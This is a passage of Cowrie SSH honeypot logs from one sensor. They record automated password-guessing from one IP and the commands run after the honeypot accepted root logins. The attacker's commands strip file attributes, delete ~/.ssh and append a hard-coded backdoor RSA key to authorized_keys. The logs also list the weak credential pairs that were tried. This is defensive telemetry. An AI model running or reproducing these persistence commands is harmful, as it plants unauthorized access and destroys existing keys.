03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:43:25.795789Z","src_ip":"212.227.235.229","session":"3a1fda9e3652"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:43:27.001145Z","src_ip":"212.227.235.229","session":"3a1fda9e3652"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:43:28.272424Z","src_ip":"212.227.235.229","session":"3a1fda9e3652"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42496,"dst_ip":"1.2.3.4","dst_port":22,"session":"550a2c9fc12e","protocol":"ssh","message":"New connection: 212.227.235.229:42496 (1.2.3.4:22) [session: 550a2c9fc12e]","sensor":"my-vps","timestamp":"2025-08-26T04:43:28.540326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:43:28.541161Z","src_ip":"212.227.235.229","session":"550a2c9fc12e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:43:28.809909Z","src_ip":"212.227.235.229","session":"550a2c9fc12e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:43:29.926473Z","src_ip":"212.227.235.229","session":"550a2c9fc12e"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:43:30.196789Z","src_ip":"212.227.235.229","session":"2fb048fc4f53"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:43:30.198101Z","src_ip":"212.227.235.229","session":"550a2c9fc12e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59232,"dst_ip":"1.2.3.4","dst_port":22,"session":"89055f614447","protocol":"ssh","message":"New connection: 212.227.235.229:59232 (1.2.3.4:22) [session: 89055f614447]","sensor":"my-vps","timestamp":"2025-08-26T04:43:47.127230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:43:47.128267Z","src_ip":"212.227.235.229","session":"89055f614447"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:43:47.404826Z","src_ip":"212.227.235.229","session":"89055f614447"}
{"eventid":"cowrie.login.success","username":"root","password":"Password123456@","message":"login attempt [root/Password123456@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:43:48.551126Z","src_ip":"212.227.235.229","session":"89055f614447"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:43:49.124558Z","src_ip":"212.227.235.229","session":"89055f614447"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:43:49.125302Z","src_ip":"212.227.235.229","session":"89055f614447"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:43:49.126619Z","src_ip":"212.227.235.229","session":"89055f614447"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:43:49.404227Z","src_ip":"212.227.235.229","session":"89055f614447"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:43:50.085158Z","src_ip":"212.227.235.229","session":"89055f614447"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:43:50.085912Z","src_ip":"212.227.235.229","session":"89055f614447"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:43:50.365145Z","src_ip":"212.227.235.229","session":"89055f614447"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:43:50.366135Z","src_ip":"212.227.235.229","session":"89055f614447"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59248,"dst_ip":"1.2.3.4","dst_port":22,"session":"48aa6a11de2d","protocol":"ssh","message":"New connection: 212.227.235.229:59248 (1.2.3.4:22) [session: 48aa6a11de2d]","sensor":"my-vps","timestamp":"2025-08-26T04:43:50.650410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:43:50.651428Z","src_ip":"212.227.235.229","session":"48aa6a11de2d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:43:50.936485Z","src_ip":"212.227.235.229","session":"48aa6a11de2d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:43:52.118112Z","src_ip":"212.227.235.229","session":"48aa6a11de2d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:43:53.405626Z","src_ip":"212.227.235.229","session":"48aa6a11de2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59256,"dst_ip":"1.2.3.4","dst_port":22,"session":"37b6960ab1ac","protocol":"ssh","message":"New connection: 212.227.235.229:59256 (1.2.3.4:22) [session: 37b6960ab1ac]","sensor":"my-vps","timestamp":"2025-08-26T04:43:53.682078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:43:53.683000Z","src_ip":"212.227.235.229","session":"37b6960ab1ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:43:53.961030Z","src_ip":"212.227.235.229","session":"37b6960ab1ac"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:43:55.141385Z","src_ip":"212.227.235.229","session":"37b6960ab1ac"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:43:55.470435Z","src_ip":"212.227.235.229","session":"89055f614447"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:43:55.472124Z","src_ip":"212.227.235.229","session":"37b6960ab1ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57332,"dst_ip":"1.2.3.4","dst_port":22,"session":"5df197436b57","protocol":"ssh","message":"New connection: 212.227.235.229:57332 (1.2.3.4:22) [session: 5df197436b57]","sensor":"my-vps","timestamp":"2025-08-26T04:43:56.638304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:43:56.639557Z","src_ip":"212.227.235.229","session":"5df197436b57"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:43:56.892832Z","src_ip":"212.227.235.229","session":"5df197436b57"}
{"eventid":"cowrie.login.failed","username":"sysadmin","password":"123456","message":"login attempt [sysadmin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T04:43:57.948403Z","src_ip":"212.227.235.229","session":"5df197436b57"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:43:59.204189Z","src_ip":"212.227.235.229","session":"5df197436b57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57106,"dst_ip":"1.2.3.4","dst_port":22,"session":"bafcec966f45","protocol":"ssh","message":"New connection: 212.227.235.229:57106 (1.2.3.4:22) [session: bafcec966f45]","sensor":"my-vps","timestamp":"2025-08-26T04:44:10.303668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:44:10.304331Z","src_ip":"212.227.235.229","session":"bafcec966f45"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:44:10.379904Z","src_ip":"212.227.235.229","session":"bafcec966f45"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:44:10.403385Z","src_ip":"79.124.8.120","session":"2202daa95b8b"}
{"eventid":"cowrie.session.closed","duration":180.06140804290771,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:44:10.406884Z","src_ip":"79.124.8.120","session":"2202daa95b8b"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwe123!@#","message":"login attempt [root/Qwe123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:44:10.723855Z","src_ip":"212.227.235.229","session":"bafcec966f45"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:44:10.895329Z","src_ip":"212.227.235.229","session":"bafcec966f45"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:44:10.896019Z","src_ip":"212.227.235.229","session":"bafcec966f45"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:44:10.896925Z","src_ip":"212.227.235.229","session":"bafcec966f45"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:44:10.973616Z","src_ip":"212.227.235.229","session":"bafcec966f45"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:44:11.228752Z","src_ip":"212.227.235.229","session":"bafcec966f45"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:44:11.229556Z","src_ip":"212.227.235.229","session":"bafcec966f45"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:44:11.306921Z","src_ip":"212.227.235.229","session":"bafcec966f45"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:44:11.307905Z","src_ip":"212.227.235.229","session":"bafcec966f45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57120,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e465a0da7c3","protocol":"ssh","message":"New connection: 212.227.235.229:57120 (1.2.3.4:22) [session: 0e465a0da7c3]","sensor":"my-vps","timestamp":"2025-08-26T04:44:11.379692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:44:11.380527Z","src_ip":"212.227.235.229","session":"0e465a0da7c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:44:11.455059Z","src_ip":"212.227.235.229","session":"0e465a0da7c3"}
